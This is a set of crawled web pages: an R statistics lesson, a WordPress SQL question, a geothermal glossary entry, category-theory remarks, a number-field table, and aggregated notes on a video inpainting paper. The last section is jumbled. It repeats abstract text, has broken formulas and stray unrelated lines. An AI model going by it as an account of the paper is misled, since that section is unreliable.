## Course Outline • segmentGetting Started (Don't Skip This Part) • segmentStatistics and Data Science: A Modeling Approach • segmentPART I: EXPLORING VARIATION • segmentChapter 1 - Welcome to Statistics: A Modeling Approach • segmentChapter 2 - Understanding Data • segmentChapter 3 - Examining Distributions • segmentChapter 4 - Explaining Variation • segmentPART II: MODELING VARIATION • segmentChapter 5 - A Simple Model • segmentChapter 6 - Quantifying Error • segmentChapter 7 - Adding an Explanatory Variable to the Model • segmentChapter 8 - Models with a Quantitative Explanatory Variable • segmentPART III: EVALUATING MODELS • segmentChapter 9 - The Logic of Inference • segmentChapter 10 - Model Comparison with F • segmentChapter 11 - Parameter Estimation and Confidence Intervals • segmentPART IV: MULTIVARIATE MODELS • segmentChapter 12 - Introduction to Multivariate Models • segmentChapter 13 - Multivariate Model Comparisons • segmentFinishing Up (Don't Skip This Part!) • segmentResources ### list College / Advanced Statistics and Data Science (ABCD) Book • College / Advanced Statistics and Data Science (ABCD) • College / Statistics and Data Science (ABC) • High School / Advanced Statistics and Data Science I (ABC) • High School / Statistics and Data Science I (AB) • High School / Statistics and Data Science II (XCD) ## 12.2 Visualizing Price = Home Size + Neighborhood Let’s explore this idea with some visualizations. We will start with a graph of the home size model, plotting PriceK by HomeSizeK, with this code: gf_point(PriceK ~ HomeSizeK, data = Smallville). We will then explore some ways we could visualize the effect of Neighborhood above and beyond that of HomeSizeK. ### Using Facet Grids Here’s a scatter plot of PriceK by HomeSizeK for the 32 homes in Smallville. One way to integrate Neighborhood into the same visualization is to make a grid of scatter plots, each one representing a different neighborhood. We can do this by chaining on gf_facet_grid(Neighborhood ~ .) on top of the scatter plot. Because we put Neighborhood before the tilde (Neighborhood ~ .) the two graphs will be stacked vertically (i.e., along the y-axis). To put the graphs side-by-side (i.e., in a grid along the x-axis), we would put the variable after the tilde: . ~ Neighborhood. Notice that in R, as in GLM notation, we usually follow the form Y ~ X. In the code block below, try putting the two scatter plots, one for each Neighborhood, side by side in a horizontal grid. require(coursekata) # delete when coursekata-r updated Smallville <- read.csv("https://docs.google.com/spreadsheets/d/e/2PACX-1vTUey0jLO87REoQRRGJeG43iN1lkds_lmcnke1fuvS7BTb62jLucJ4WeIt7RW4mfRpk8n5iYvNmgf5l/pub?gid=1024959265&single=true&output=csv") Smallville$Neighborhood <- factor(Smallville$Neighborhood) Smallville$HasFireplace <- factor(Smallville$HasFireplace) # Make a horizontal grid of scatter plots using Neighborhood gf_point(PriceK~ HomeSizeK, data = Smallville) gf_point(PriceK~ HomeSizeK, data = Smallville) %>% gf_facet_grid(. ~ Neighborhood) # temporary SCT ex() %>% check_error() CK Code: D1_Code_Visualizing_01 Based on these plots, you can see that knowing both neighborhood and home size would improve your predictions. One way to see this is to look, within each neighborhood, at the prices of homes that are between 1000 and 1500 square feet (i.e., HomeSizeK between 1.0 and 1.5). We have colored them differently in the faceted plot below. You can see that even for homes the same size, there still are higher prices in Downtown than in Eastside. ### Using Color Another approach to adding neighborhood to the scatter plot of PriceK by HomeSizeK is to assign different colors to points representing homes from the different neighborhoods. You can do this by adding color = ~Neighborhood to the scatter plot. (The ~ tilde tells R that Neighborhood is a variable.) Try it in the code block below. require(coursekata) # delete when coursekata-r updated Smallville <- read.csv("https://docs.google.com/spreadsheets/d/e/2PACX-1vTUey0jLO87REoQRRGJeG43iN1lkds_lmcnke1fuvS7BTb62jLucJ4WeIt7RW4mfRpk8n5iYvNmgf5l/pub?gid=1024959265&single=true&output=csv") Smallville$Neighborhood <- factor(Smallville$Neighborhood) Smallville$HasFireplace <- factor(Smallville$HasFireplace) # Add in the color argument gf_point(PriceK ~ HomeSizeK, data = Smallville)gf_point(PriceK ~ HomeSizeK, data = Smallville, color = ~Neighborhood) # temporary SCT ex() %>% check_error() CK Code: D1_Code_Visualizing_02 We used this code (also overlaying the HomeSizeK regression line on the scatter plot) to get the graph below. HomeSizeK_model <- lm(PriceK ~ HomeSizeK, data = Smallville) gf_point(PriceK ~ HomeSizeK, data = Smallville, color= ~ Neighborhood) %>% gf_model(HomeSizeK_model, color = "black") Adding the regression line makes it easier to see the error (or residuals) leftover from the HomeSizeK model. Notice that the teal dots (homes from Downtown) are mostly above the regression line (i.e., with positive residuals from the HomeSizeK model) while the purple dots (from Eastside) are mostly below the line (negative residuals). This indicates that Downtown homes are generally more expensive than what the home size model would predict, while Eastside homes are less expensive. This pattern is a clue that tells us that adding Neighborhood into the HomeSizeK model will explain additional variation in PriceK above and beyond that explained by just the home size model alone.
2022-08-10 23:30:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4421354830265045, "perplexity": 6905.765033299528}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571222.74/warc/CC-MAIN-20220810222056-20220811012056-00033.warc.gz"}
https://www.wptricks.com/question/how-to-publish-a-post-if-condition-is-met/
## How to publish a post if condition is met? Question I’m trying to have my posts published when wp_posts.ID IN (list). Would it mess up the cache? Is it enough to just do SET posts_status = 'publish' WHERE wp_posts.ID IN (list) ? I found one answer that could be the solution here https://wordpress.stackexchange.com/a/313060/151436 but I’m not really sure how to implement it. Also, it would be great if a solution had like a minute gap between publishing, so it doesn’t slow down the server. Any help would be greatly apriciated! Thank you 0 3 years 2019-11-01T09:21:37-05:00 0 Answers 73 views 0
2023-02-08 03:22:03
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17835019528865814, "perplexity": 2259.2936358069574}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500671.13/warc/CC-MAIN-20230208024856-20230208054856-00127.warc.gz"}
https://mammothmemory.net/geography/geography-vocabulary/energy/geothermal-energy.html
# Geothermal energy – Energy generated by heat stored deep in the earth In order to learn the term geothermal we need to break down the word and remember its parts: Geo = earth Thermal = heat The way to remember thermal is heat: My Thermos flask always has a hot drink in it. Thermal = heat The way to remember that Geo is earth: Gee! we owe (geo) everything to the earth. Geo = earth So Geothermal = Earth Heat or heat from the earth Geothermal is heat from the earth that can be used to heat things like a house: Pipes buried in the earth with water circulating through them can be used to heat a house. If you dug a deep hole in the ground, you would notice the temperature increasing as you go lower and lower. This is geothermal energy – the heat stored in the earth which originates from the formation of the planet and from the radioactive decay of materials. The core of the earth is molten rock, with a temperature of about 5,200° Celsius (9,392° Fahrenheit). The temperature reduces greatly towards the earth's surface, but even the lower heat in the crust (see Mammoth Memory, The Structure of the Earth) is sufficient to provide heat for a variety of purposes, including the heating of homes. Geothermal energy is one of the ways in which people's dependency on fossil fuels (oil, coal and gas) is being broken, providing sustainable energy – that is, energy with no significant consequences for the environment either now or in the future. Geothermal power plants take heat from deep inside the Earth to generate steam to make electricity, while geothermal heat pumps tap into heat close to the Earth's surface to heat water and buildings.
2022-09-27 10:15:59
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.850029468536377, "perplexity": 1209.9186753199342}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00396.warc.gz"}
https://stacks.math.columbia.edu/tag/06GK
Remarks 89.5.2. Everything about categories fibered in groupoids translates directly to the cofibered setting. The following remarks are meant to fix notation. Let $\mathcal{C}$ be a category. 1. We often omit the functor $p: \mathcal{F} \to \mathcal{C}$ from the notation. 2. The fiber category over an object $U$ in $\mathcal{C}$ is denoted by $\mathcal{F}(U)$. Its objects are those of $\mathcal{F}$ lying over $U$ and its morphisms are those of $\mathcal{F}$ lying over $\text{id}_ U$. If $x, y$ are objects of $\mathcal{F}(U)$, we sometimes write $\mathop{\mathrm{Mor}}\nolimits _ U(x, y)$ for $\mathop{\mathrm{Mor}}\nolimits _{\mathcal{F}(U)}(x, y)$. 3. The fibre categories $\mathcal{F}(U)$ are groupoids, see Categories, Lemma 4.35.2. Hence the morphisms in $\mathcal{F}(U)$ are all isomorphisms. We sometimes write $\text{Aut}_ U(x)$ for $\mathop{\mathrm{Mor}}\nolimits _{\mathcal{F}(U)}(x, x)$. 4. Let $\mathcal{F}$ be a category cofibered in groupoids over $\mathcal{C}$, let $f: U \to V$ be a morphism in $\mathcal{C}$, and let $x \in \mathop{\mathrm{Ob}}\nolimits (\mathcal{F}(U))$. A pushforward of $x$ along $f$ is a morphism $x \to y$ of $\mathcal{F}$ lying over $f$. A pushforward is unique up to unique isomorphism (see the discussion following Categories, Definition 4.33.1). We sometimes write $x \to f_*x$ for “the” pushforward of $x$ along $f$. 5. A choice of pushforwards for $\mathcal{F}$ is the choice of a pushforward of $x$ along $f$ for every pair $(x, f)$ as above. We can make such a choice of pushforwards for $\mathcal{F}$ by the axiom of choice. 6. Let $\mathcal{F}$ be a category cofibered in groupoids over $\mathcal{C}$. Given a choice of pushforwards for $\mathcal{F}$, there is an associated pseudo-functor $\mathcal{C} \to \textit{Groupoids}$. We will never use this construction so we give no details. 7. A morphism of categories cofibered in groupoids over $\mathcal{C}$ is a functor commuting with the projections to $\mathcal{C}$. If $\mathcal{F}$ and $\mathcal{F}'$ are categories cofibered in groupoids over $\mathcal{C}$, we denote the morphisms from $\mathcal{F}$ to $\mathcal{F}'$ by $\mathop{\mathrm{Mor}}\nolimits _\mathcal {C}(\mathcal{F}, \mathcal{F}')$. 8. Categories cofibered in groupoids form a $(2, 1)$-category $\text{Cof}(\mathcal{C})$. Its 1-morphisms are the morphisms described in (7). If $p : \mathcal{F} \to C$ and $p': \mathcal{F}' \to \mathcal{C}$ are categories cofibered in groupoids and $\varphi , \psi : \mathcal{F} \to \mathcal{F}'$ are $1$-morphisms, then a 2-morphism $t : \varphi \to \psi$ is a morphism of functors such that $p'(t_ x) = \text{id}_{p(x)}$ for all $x \in \mathop{\mathrm{Ob}}\nolimits (\mathcal{F})$. 9. Let $F : \mathcal{C} \to \textit{Groupoids}$ be a functor. There is a category cofibered in groupoids $\mathcal{F} \to \mathcal{C}$ associated to $F$ as follows. An object of $\mathcal{F}$ is a pair $(U, x)$ where $U \in \mathop{\mathrm{Ob}}\nolimits (\mathcal{C})$ and $x \in \mathop{\mathrm{Ob}}\nolimits (F(U))$. A morphism $(U, x) \to (V, y)$ is a pair $(f, a)$ where $f \in \mathop{\mathrm{Mor}}\nolimits _\mathcal {C}(U, V)$ and $a \in \mathop{\mathrm{Mor}}\nolimits _{F(V)}(F(f)(x), y)$. The functor $\mathcal{F} \to \mathcal{C}$ sends $(U, x)$ to $U$. See Categories, Section 4.37. 10. Let $\mathcal{F}$ be cofibered in groupoids over $\mathcal{C}$. For $U \in \mathop{\mathrm{Ob}}\nolimits (\mathcal{C})$ set $\overline{\mathcal{F}}(U)$ equal to the set of isomorphisms classes of the category $\mathcal{F}(U)$. If $f : U \to V$ is a morphism of $\mathcal{C}$, then we obtain a map of sets $\overline{\mathcal{F}}(U) \to \overline{\mathcal{F}}(V)$ by mapping the isomorphism class of $x$ to the isomorphism class of a pushforward $f_*x$ of $x$ see (4). Then $\overline{\mathcal{F}} : \mathcal{C} \to \textit{Sets}$ is a functor. Similarly, if $\varphi : \mathcal{F} \to \mathcal{G}$ is a morphism of cofibered categories, we denote by $\overline{\varphi }: \overline{\mathcal{F}} \to \overline{\mathcal{G}}$ the associated morphism of functors. 11. Let $F: \mathcal{C} \to \textit{Sets}$ be a functor. We can think of a set as a discrete category, i.e., as a groupoid with only identity morphisms. Then the construction (9) associates to $F$ a category cofibered in sets. This defines a fully faithful embedding of the category of functors $\mathcal{C} \to \textit{Sets}$ to the category of categories cofibered in groupoids over $\mathcal{C}$. We identify the category of functors with its image under this embedding. Hence if $F : \mathcal{C} \to \textit{Sets}$ is a functor, we denote the associated category cofibered in sets also by $F$; and if $\varphi : F \to G$ is a morphism of functors, we denote still by $\varphi$ the corresponding morphism of categories cofibered in sets, and vice-versa. See Categories, Section 4.38. 12. Let $U$ be an object of $\mathcal{C}$. We write $\underline{U}$ for the functor $\mathop{\mathrm{Mor}}\nolimits _\mathcal {C}(U, -): \mathcal{C} \to \textit{Sets}$. This defines a fully faithful embedding of $\mathcal C^{opp}$ into the category of functors $\mathcal{C} \to \textit{Sets}$. Hence, if $f : U \to V$ is a morphism, we are justified in denoting still by $f$ the induced morphism $\underline{V} \to \underline{U}$, and vice-versa. 13. Fiber products of categories cofibered in groupoids: If $\mathcal{F} \to \mathcal{H}$ and $\mathcal{G} \to \mathcal{H}$ are morphisms of categories cofibered in groupoids over $\mathcal{C}_\Lambda$, then a construction of their 2-fiber product is given by the construction for their 2-fiber product as categories over $\mathcal{C}_\Lambda$, as described in Categories, Lemma 4.32.3. 14. Products of categories cofibered in groupoids: If $\mathcal{F}$ and $\mathcal{G}$ are categories cofibered in groupoids over $\mathcal{C}_\Lambda$ then their product is defined to be the $2$-fiber product $\mathcal{F} \times _{\mathcal{C}_\Lambda } \mathcal{G}$ as described in Categories, Lemma 4.32.3. 15. Restricting the base category: Let $p : \mathcal{F} \to \mathcal{C}$ be a category cofibered in groupoids, and let $\mathcal{C}'$ be a full subcategory of $\mathcal{C}$. The restriction $\mathcal{F}|_{\mathcal{C}'}$ is the full subcategory of $\mathcal{F}$ whose objects lie over objects of $\mathcal{C}'$. It is a category cofibered in groupoids via the functor $p|_{\mathcal{C}'}: \mathcal{F}|_{\mathcal{C}'} \to \mathcal{C}'$. In your comment you can use Markdown and LaTeX style mathematics (enclose it like $\pi$). A preview option is available if you wish to see how it works out (just click on the eye in the toolbar).
2022-01-27 16:59:08
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 2, "x-ck12": 0, "texerror": 0, "math_score": 0.995704174041748, "perplexity": 102.90236909058287}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320305277.88/warc/CC-MAIN-20220127163150-20220127193150-00193.warc.gz"}
http://www.lmfdb.org/NumberField/?signature=%5B3,%200%5D
Results: (displaying matches 1-20 of 201440) Label Polynomial Discriminant Galois group Class group 3.3.49.1 x3 - x2 - 2x + 1 $7^{2}$ $C_3$ Trivial 3.3.81.1 x3 - 3x - 1 $3^{4}$ $C_3$ Trivial 3.3.148.1 x3 - x2 - 3x + 1 $2^{2}\cdot 37$ $S_3$ Trivial 3.3.169.1 x3 - x2 - 4x - 1 $13^{2}$ $C_3$ Trivial 3.3.229.1 x3 - 4x - 1 $229$ $S_3$ Trivial 3.3.257.1 x3 - x2 - 4x + 3 $257$ $S_3$ Trivial 3.3.316.1 x3 - x2 - 4x + 2 $2^{2}\cdot 79$ $S_3$ Trivial 3.3.321.1 x3 - x2 - 4x + 1 $3\cdot 107$ $S_3$ Trivial 3.3.361.1 x3 - x2 - 6x + 7 $19^{2}$ $C_3$ Trivial 3.3.404.1 x3 - x2 - 5x - 1 $2^{2}\cdot 101$ $S_3$ Trivial 3.3.469.1 x3 - x2 - 5x + 4 $7\cdot 67$ $S_3$ Trivial 3.3.473.1 x3 - 5x - 1 $11\cdot 43$ $S_3$ Trivial 3.3.564.1 x3 - x2 - 5x + 3 $2^{2}\cdot 3\cdot 47$ $S_3$ Trivial 3.3.568.1 x3 - x2 - 6x - 2 $2^{3}\cdot 71$ $S_3$ Trivial 3.3.621.1 x3 - 6x - 3 $3^{3}\cdot 23$ $S_3$ Trivial 3.3.697.1 x3 - 7x - 5 $17\cdot 41$ $S_3$ Trivial 3.3.733.1 x3 - x2 - 7x + 8 $733$ $S_3$ Trivial 3.3.756.1 x3 - 6x - 2 $2^{2}\cdot 3^{3}\cdot 7$ $S_3$ Trivial 3.3.761.1 x3 - x2 - 6x - 1 $761$ $S_3$ Trivial 3.3.785.1 x3 - x2 - 6x + 5 $5\cdot 157$ $S_3$ Trivial Next
2018-09-20 02:54:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.34751561284065247, "perplexity": 677.0523555887365}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267156376.8/warc/CC-MAIN-20180920020606-20180920040606-00228.warc.gz"}
http://magic-sw.com/wall-hangings-ovinsj/archive.php?id=an-internal-learning-approach-to-video-inpainting-df0037
First, we show that coherent video inpainting is possible without a priori training. Image Inpainting. Zhang H, Mai L, Xu N, et al. Internal Learning. Haotian Zhang, Long Mai, Ning Xu, Zhaowen Wang, John Collomosse, Hailin Jin; Proceedings of the IEEE/CVF International Conference on Computer Vision (ICCV), 2019, pp. arXiv preprint arXiv:1701.07875. 2019 IEEE/CVF International Conference on Computer Vision (ICCV), 2720-2729. An Internal Learning Approach to Video Inpainting Haotian Zhang, Long Mai, Ning Xu, Zhaowen Wang, John Collomosse, Hailin Jin. Deep Learning-based inpainting methods fill in masked values in an end-to-end manner by optimizing a deep encoder-decoder network to reconstruct the input image. Full Text. Please note that the Journal of Minimally Invasive Gynecology will no longer consider Instruments and Techniques articles starting on January 4, 2021. encourage the training to foucs on propagating information inside the hole. The noise map Ii has one channel and shares the same spatial size with the input frame. Abstract. Please refer to requirements.txt for... Usage. BEAD STRINGING (6:07) A story of the hand and the mind working together. We propose the first deep learning solution to video frame inpainting, a challenging instance of the general video inpainting problem with applications in video editing, manipulation, and forensics. As artificial intelligence technology developed, deep learning technology was introduced in inpainting research, helping to improve performance. High-quality video inpainting that completes missing regions in video frames is a promising yet challenging task. 1) $I(F)$. (2019) Various Approaches for Video Inpainting: A Survey. Video inpainting is an important technique for a wide vari-ety of applications from video content editing to video restoration. Mark. Inpainting is a conservation process where damaged, deteriorating, or missing parts of an artwork are filled in to present a complete image. • The convolutional encoder–decoder network is developed. Haotian Zhang. Second, we show that such a framework can jointly generate both appearance and flow, whilst exploiting these complementary modalities to ensure mutual consistency. An Internal Learning Approach to Video Inpainting. [40] We propose a novel video inpainting algorithm that simultaneously hallucinates missing appearance and motion (optical flow) information, building upon the recent 'Deep Image Prior' (DIP) that exploits convolutional network architectures to enforce plausible texture in static images. In a nutshell, the contributions of the present paper are as follows: { We show that a mask-speci c inpainting method can be learned with neural Tip: you can also follow us on Twitter Abstract. Video inpainting is an important technique for a wide vari-ety of applications from video content editing to video restoration. 2019 5th International Conference On Computing, Communication, Control And Automation (ICCUBEA), 1-5. In pursuit of better visual synthesis and inpainting approaches, researchers from Adobe Research and Stanford University have proposed an internal learning for video inpainting method … An Internal Learning Approach to Video Inpainting . This paper proposes a new approach of video inpainting technology to detect and restore damaged films. Keyword [Deep Image Prior] Zhang H, Mai L, Xu N, et al. 3.4), but do not use the mask information. In ECCV2020 Authors: Haotian Zhang, Long Mai, Ning Xu, Zhaowen Wang, John Collomosse, Hailin Jin. [40] 2720-2729, 2019. Please first … First, we show that coherent video inpainting is possible without a priori training. 2019 IEEE/CVF International Conference on Computer Vision (ICCV) , 2720-2729. We propose a novel video inpainting algorithm that simultaneously hallucinates missing appearance and motion (optical flow) information, building upon the recent 'Deep ... An Internal Learning Approach to Video Inpainting. In this work, we approach video inpainting with an internal learning formulation. (2019) An Internal Learning Approach to Video Inpainting. Browse our catalogue of tasks and access state-of-the-art solutions. Mark. Keyword [Deep Image Prior] Zhang H, Mai L, Xu N, et al. An Internal Learning Approach to Video Inpainting. Full Text. 1) Pick $N$ frames which are consecutive with a fixed frame interval of $t$ as a batch. Long Mai [0] Hailin Jin [0] Zhaowen Wang (王兆文) [0] Ning Xu. VIDEO INPAINTING OF OCCLUDING AND OCCLUDED OBJECTS Kedar A. Patwardhan, §Guillermo Sapiro, and Marcelo Bertalmio¶ §University of Minnesota, Minneapolis, MN 55455, kedar,guille@ece.umn.edu and ¶Universidad Pompeu-Fabra, Barcelona, Spain ABSTRACT We present a basic technique to fill-in missing parts of a The idea is that each image has a specific label, and neural networks learn to recognize the mapping between images and their labels by repeatedly being taught or “trained”. Compared with image inpainting … References [1] M . The reliable flow estimation computed as te intersection of aligned masks of frame $i$ to $j$.3) 6 adjacent frames $j \in {i \pm 1, i \pm 3, i \pm 5}$.4) $O_{i,j}, \hat{F_{i,j}}$. weight of consistency loss.4) $\omega_p=0.01$. We propose a novel video inpainting algorithm that simultaneously hallucinates missing appearance and motion (optical flow) information, building upon the recent 'Deep Image Prior' (DIP) that exploits convolutional network architectures to enforce plausible texture in static images. Video inpainting, which aims at filling in missing regions of a video, remains challenging due to the difficulty of preserving the precise spatial and temporal coherence of video contents. An Internal Learning Approach to Video Inpainting . Tip: you can also follow us on Twitter Mark. For a given defect video, the difficulty of video inpainting lies in how to maintain the space–time continuity after filling the defect area and form a smooth and natural repaired result. Video inpainting has also been used as a self-supervised task for deep feature learning [32] which has a different goal from ours. A novel deep learning architecture is proposed which contains two subnetworks: a temporal structure inference network and a spatial detail recovering network. 61. Then, the skipping patch matching was proposed by Bacchuwar et al. arXiv preprint arXiv:1909.07957, 2019. A novel deep learning architecture is proposed which contains two subnetworks: a temporal structure inference network and a spatial detail recovering network. 2720-2729. We take a generative approach to inpainting based on internal (within-video) learning without reliance upon an external corpus of visual data to train a one-size-fits-all model for the large space of general videos. $L=\omega_r L_r + \omega_f L_f + \omega_c L_c + \omega_p L_p$. An Internal Learning Approach to Video Inpainting[J]. We propose a novel video inpainting algorithm that simultaneously hallucinates missing appearance and motion (optical flow) information, building upon the recent `Deep Image Prior' (DIP) that exploits convolutional network architectures to enforce plausible texture in static images. our work is [25] who apply a deep learning approach to both denoising and inpainting. Abstract. Highlights. An Internal Learning Approach to Video Inpainting Install. An Internal Learning Approach to Video Inpainting - Haotian Zhang - ICCV 2019 Info. Feature Learning by Inpainting (b) Context encoder trained with reconstruction loss for feature learning by filling in arbitrary region dropouts in the input. The code has been tested on pytorch 1.0.0 with python 3.5 and cuda 9.0. from frame $I_i$ to frame $I_j$.2) $M^f_{i,j} = M_i \cap M_j (F_{i,j})$. High-quality video inpainting that completes missing regions in video frames is a promising yet challenging task. • The weighted cross-entropy is designed as the loss function. We take a generative approach to inpainting based on internal (within-video) learning without reliance upon an external corpus of visual data to train a one-size-fits-all model for the large space of general videos. The noise map Ii has one channel and shares the same spatial size with the input frame. John P. Collomosse [0] ICCV, pp. • Inpainting feature learning is supervised by a class label matrix for each image. Long Mai [0] Ning Xu (徐宁) [0] Zhaowen Wang (王兆文) [0] John P. Collomosse [0] Hailin Jin [0] 2987614525, pp. In ECCV2020; Proposal-based Video Completion, Hu et al. $L_c(\hat{I_j}, \hat{F_{i,j}}) = || (1-M_{i,j}^f) \odot ( \hat{I_j}(\hat{F_{i,j}}) - \hat{I_i}) ||_2^2$. 2720-2729, 2019. User's mobile terminal supports test, graphics, streaming media and standard web content. In this paper, it proposes a video inpainting method (DIP-Vid-FLow)1) Based on Deep Image Prior.2) Based on Internal Learning (some loss funcitions). weight of image generation loss.2) $\omega_f=0.1$. Request PDF | On Oct 1, 2019, Haotian Zhang and others published An Internal Learning Approach to Video Inpainting | Find, read and cite all the research you need on ResearchGate The scope of video editing and manipulation techniques has dramatically increased thanks to AI. tion of learning-based video inpainting by investigating an internal (within-video) learning approach. Proposal-based Video Completion Yuan-Ting Hu1, Heng Wang2, Nicolas Ballas3, Kristen Grauman3;4, and Alexander G. Schwing1 1University of Illinois Urbana-Champaign 2Facebook AI 3Facebook AI Research 4University of Texas at Austin Abstract. We propose a novel video inpainting algorithm that simultaneously hallucinates missing appearance and motion (optical flow) information, building upon … We present a new data-driven video inpainting method for recovering missing regions of video frames. weight of flow generation loss.3) $\omega_c=1$. However, existing methods either suffer from inaccurate short-term context aggregation or rarely explore long-term frame information. ... for video inpainting. Please contact me ([email protected]) if you find any interesting paper about inpainting that I missed.I would greatly appreciate it : ) I'm currently busy on some other projects. To overcome the … State-of-the-art approaches adopt attention models to complete a frame by searching missing contents from reference frames, and further complete whole videos … Arjovsky, S. Chintala, and L. Bottou (2017) Wasserstein gan. Request PDF | On Oct 1, 2019, Haotian Zhang and others published An Internal Learning Approach to Video Inpainting | Find, read and cite all the research you need on ResearchGate tion of learning-based video inpainting by investigating an internal (within-video) learning approach. Abstract: We propose a novel video inpainting algorithm that simultaneously hallucinates missing appearance and motion (optical flow) information, building upon the recent 'Deep Image Prior' (DIP) that exploits convolutional network … DOI: 10.1007/978-3-030-58548-8_42 Corpus ID: 221655127. They are also able to do blind inpainting (as we do in Sec. , which reduces the amount of the computational cost for forensics. Get the latest machine learning methods with code. They are confident however that the new approach will attract more research attention to “the interesting direction of internal learning” in video inpainting. In this work, we approach video inpainting with an internal learning formulation. Get the latest machine learning methods with code. weight of perceptual loss. Our work is inspired by the recent ‘Deep Image Prior’ (DIP) work by Ulyanov et al. Browse our catalogue of tasks and access state-of-the-art solutions. First, we show that coherent video inpainting is possible without a priori training. An Internal Learning Approach to Video Inpainting International Conference on Computer Vision (ICCV) 2019 Published October 28, 2019 Haotian Zhang, Long … In extending DIP to video we make two important contributions. An Internal Learning Approach to Video Inpainting International Conference on Computer Vision (ICCV) 2019 Published October 28, 2019 Haotian Zhang, Long Mai, Ning Xu, Zhaowen Wang, John Collomosse, Hailin Jin arXiv preprint arXiv:1909.07957, 2019. (2019) Various Approaches for Video Inpainting: A Survey. The new age alternative is to use deep learning to inpaint images by utilizing supervised image classification. The general idea is to use the input video as the training data to learn a generative neural network $$G_{\theta}$$ to generate each target frame $$I^*_i$$ from a corresponding noise map $$N_i$$. The model is trained entirely on the input video (with holes) without any external data, optimizing the combination of the image generation loss $$L_r$$, perceptual loss $$L_p$$, flow generation loss $$L_f$$ and consistency loss $$L_c$$. Video inpainting aims to restore missing regions of a video and has many applications such as video editing and object removal. Our work is inspired by the recent ‘Deep Image Prior’ (DIP) work by Ulyanov et al. Haotian Zhang. Download PDF. We take a generative approach to inpainting based on internal (within-video) learning without reliance upon an external corpus of visual data to train a one-size-fits-all model for the large space of general videos. Experiments show the effectiveness of our algorithm in tracking and removing large occluding objects as well as thin scratches. Combined Laparoscopic-Hysteroscopic Isthmoplasty Using the Rendez-vous Technique Guided Step by Step Click here to read more. In this work, we approach video inpainting with an internal learning formulation. The approach for video inpainting involves the automated tracking of the object 